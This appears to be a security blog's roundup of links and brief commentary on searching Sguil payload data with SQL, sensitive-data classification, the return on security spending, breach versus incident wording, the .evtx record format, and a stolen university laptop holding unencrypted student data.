Busy, busy busy. If only I had more time during the day.

Here’s the list:

Searching inside payload data – Good little SQL statement to hang on to.

Almost all of my searches involve IPs and/or port numbers, and Sguil has a lot of built-in support for these types of database queries, making them very easy to deal with. Sometimes, though, you want to search on something a little more difficult.

This morning, for example, I had a specific URL that was used in some PHP injection attack attempts, and I wanted to find only those alerts that had that URL as part of their data payload.

Constructing a query for this is actually pretty easy, if you use the HEX() and the CONCAT() SQL functions. If you’re using the GUI interface, you only have to construct the WHERE clause, so you can do something like the following…

Explaining Sensitive Information – Unfortunately there is no definitive method for classifying sensitive information. Which begs the question…shouldn’t there be?

Classification of data starts with defining that data. Unfortunately there are many definitions for personal or private information and these definitions are often different depending on country, state, organization, regulation, and other factors.

Network Security Monitoring Case Study – I love case studies!

So this is the major question. How do you convince management or other functional areas that monitoring is important? It sounds to me like my friend has already scored some wins by freeing bandwidth used by misconfigured systems, simplifying firewall rules, and examining individual problematic hosts.

It’s important to remember that there is no return on security investment. Security is a cost center that exists to prevent or reduce loss. It is not financially correct to believe you are “earning” a “return” by spending time and money to avoid a loss.

If I need to spend $1000 to hire a guard to protect my $10000 taxi, I am not earning a return on my investment — I am preventing the theft of my taxi. If I invest that $1000 in a ticketing and GPS system that makes me more productive ferrying passengers (perhaps increasing my dollars per hour worked), then I have enjoyed a ROI once my $1000 expense is covered.

Breach vs. Incident: Semantics or Something More? – Personally, I tend to think that a “breach” is an intrusion outside of policy whereas an “incident” would be the proceeding results of the aforementioned breach (attack a server, obtain sensitive documents, etc.).

What I find so fascinating about this statement is that the distinction between incident and breach and that an “incident” should not be viewed in the same light as a “breach”. So I started thinking, is this distinction merely a semantic issue or are there some underlying assumption amongst the general public that an incident is an everyday, and perhaps less dangerous, occurrence then a breach. One of the words is a simple noun that brings to mind a singular event of some type that may or may not be harmful. The other word is more action oriented and brings to mind, at least to my mind, images of whales bursting through the surface of the water and other dynamic events. Given the very differences in these words, should they be used as interchangeably as they are in the Information Security arena?

Evtx Event Record – Interesting.

This article documents the structure of a single event record within a Vista Event Log (.evtx) file.

The event record starts with a magic string, two asterisks followed by two null bytes. It is framed by matching length indications. They state the whole record’s size, from the magic string to the trailing length indicator. This is similar to the record structure of the old NT event logging service. The length indications at the beginning and at the end of an event record allow the logging service to traverse the chain of records efficiently in both directions.

Laptop Containing UMN Student Information Stolen from Locked Car – Sigh…..

The University of Minnesota is alerting students after a laptop containing student grade information was stolen from a professors car during a trip to Palo Alto. The laptop, belonging Elizabeth Beaumont of the political science department, contained the names, e-mail address, internal University IDs and grades for students enrolled in Beaumont’s classes from fall 2005 until present. While the University has a policy that all non-public information must be encrypted, 70-80% of the political science laptops, including Beaumont’s, have no encryption. The University has plans in place to ensure all political science laptops are encrypted by the end of the summer.